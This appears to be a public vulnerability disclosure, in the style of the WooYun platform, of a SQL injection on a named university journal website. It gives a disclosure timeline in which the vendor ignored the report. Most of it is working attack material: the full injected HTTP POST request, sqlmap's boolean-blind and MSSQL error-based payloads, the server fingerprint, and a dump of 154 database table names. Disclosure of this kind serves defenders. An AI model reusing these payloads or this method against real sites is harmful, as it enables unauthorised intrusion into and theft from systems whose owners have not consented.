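2015-11-24: Details reported to the vendor; awaiting vendor handling
2015-11-29: The vendor actively ignored the vulnerability; details disclosed to the public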
POST /ch/reader/wait_published_articles.aspx HTTP/1.1
Content-Length: 1977
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://jmsc.tju.edu.cn
Cookie: ASP.NET_SessionId=ozyrudrrmn55mw55yrhioijr
Host: jmsc.tju.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

Query=%b2%e9%d1%af&Key=-1' OR 1=1* -- &KeyList=title&to=1&__EVENTARGUMENT=&__EVENTTARGET=&__VIEWSTATE=[value omitted]&__VIEWSTATEENCRYPTED=
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Query=%b2%e9%d1%af&Key=-1' OR 1=1 AND 1059=1059 -- &KeyList=title&to=1&__EVENTARGUMENT=&__EVENTTARGET=&__VIEWSTATE=[value omitted]&__VIEWSTATEENCRYPTED=

    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: Query=%b2%e9%d1%af&Key=-1' OR 1=1 AND 2755=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(98)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN (2755=2755) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(113)+CHAR(122)+CHAR(106)+CHAR(113))) -- &KeyList=title&to=1&__EVENTARGUMENT=&__EVENTTARGET=&__VIEWSTATE=[value omitted]&__VIEWSTATEENCRYPTED=
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
Database: jmsc_journal
[154 tables]
+-----------------------------------------+
| GuestBook_Admin |
| GuestBook_Message |
| dtproperties |
| sysconstraints |
| syssegments |
| t_ad_click_detail |
| t_ad_cost |
| t_ad_customer |
| t_ad_position |
| t_ads |
| t_appraise_attache_list |
| t_article_appraise_bak |
| t_article_appraise_ext_bak |
| t_article_appraise_ext_history |
| t_article_appraise_history |
| t_article_attache_list |
| t_article_attache_list_all |
| t_article_attache_list_history |
| t_article_content |
| t_article_content_all |
| t_article_content_history |
| t_article_cost_history |
| t_article_duplicate_history |
| t_article_history |
| t_article_print_history |
| t_article_process_history_history |
| t_article_records_history |
| t_article_references_history |
| t_article_remark_history |
| t_article_view_history |
| t_article_view_history_indexed |
| t_audit_advice_attache_list |
| t_audit_advice_attache_list_all |
| t_audit_advice_attache_list_history |
| t_audit_advice_bak |
| t_audit_advice_content |
| t_audit_advice_content_all |
| t_audit_advice_content_bak |
| t_audit_advice_content_history |
| t_audit_advice_history |
| t_audit_cost_bak |
| t_audit_cost_history |
| t_auditor_menu |
| t_auditor_menu_category |
| t_auditor_menu_child |
| t_auditor_view_advice_history |
| t_auditor_view_attache_history |
| t_author_article_reference_history2 |
| t_author_article_reference_history_save |
| t_author_article_stat_history |
| t_author_concept_menu |
| t_author_info |
| t_author_menu |
| t_author_menu_category |
| t_author_menu_child |
| t_author_note |
| t_bargain_quarter_detail |
| t_bianwei |
| t_bianwei_info |
| t_bianwei_type |
| t_book_ad_bargain |
| t_book_ad_cost |
| t_book_ad_customer |
| t_book_ad_position |
| t_book_price |
| t_can_download_pdf_ip |
| t_cannot_download_pdf_ip |
| t_check_article_duplicate_history |
| t_column |
| t_column_category |
| t_concept_system_ext_menu |
| t_count_author_article |
| t_count_author_article_reference |
| t_counter |
| t_cross_article |
| t_cross_journal_list |
| t_customer_status |
| t_delete_four_key_data |
| t_delete_one_key_data |
| t_delete_three_key_data |
| t_delete_two_key_data |
| t_draft_article_attache_list |
| t_draft_article_content |
| t_edit_article_detail_content |
| t_edit_article_detail_content_all |
| t_edit_article_detail_content_history |
| t_edit_article_detail_history |
| t_edit_menu |
| t_edit_menu_category |
| t_edit_menu_child |
| t_edit_view_fulltext_history |
| t_editorial_concept_menu |
| t_editorial_menu |
| t_editorial_menu_category |
| t_editorial_menu_child |
| t_email_log |
| t_field_editorial_menu |
| t_field_editorial_menu_category |
| t_field_editorial_menu_child |
| t_file_content |
| t_fixed_content |
| t_fourth_menu |
| t_friend_link_category |
| t_friendlink |
| t_guestbook |
| t_guestbook_user |
| t_inquisition_cost_history |
| t_invoice_type |
| t_menu |
| t_menu_item |
| t_menu_subitem |
| t_news_category |
| t_news_second_category |
| t_nextcontent |
| t_nextcontent_author |
| t_order_toc_reader |
| t_other_journal_article_history |
| t_page_cost_history |
| t_post_elect_history |
| t_press |
| t_pub_article_attache_list |
| t_pub_author_article_reference |
| t_public_board |
| t_publish_article |
| t_publish_article_appraise |
| t_publish_article_appraise_list |
| t_publish_article_appraise_mood_list |
| t_publish_article_appraise_support |
| t_publish_article_appraise_type |
| t_publish_article_quick_search |
| t_publish_article_references |
| t_publish_article_was_referenced |
| t_publish_institution |
| t_reader_article_favorites |
| t_reader_menu |
| t_reader_menu_category |
| t_reader_menu_child |
| t_reviewer_concept_menu |
| t_send_author_book |
| t_sql_version |
| t_suggest_fence_auditor_history |
| t_wait_delete_article |
| t_wait_search_article |
| t_wait_search_author_article |
| t_wait_submit_article |
| t_wait_submit_delete_article |
| t_wait_submit_issue |
| t_wait_update_article |
| t_wait_update_issue |
| t_wait_zip_file |
| t_web_site_access |
| t_year |
| t_year_quarter |
| t_year_quarter_column |
+-----------------------------------------+
Severity: No impact (ignored by vendor)
Ignored at: 2015-11-29 15:04
Vulnerability Rank: 4 (WooYun rating)
None at this time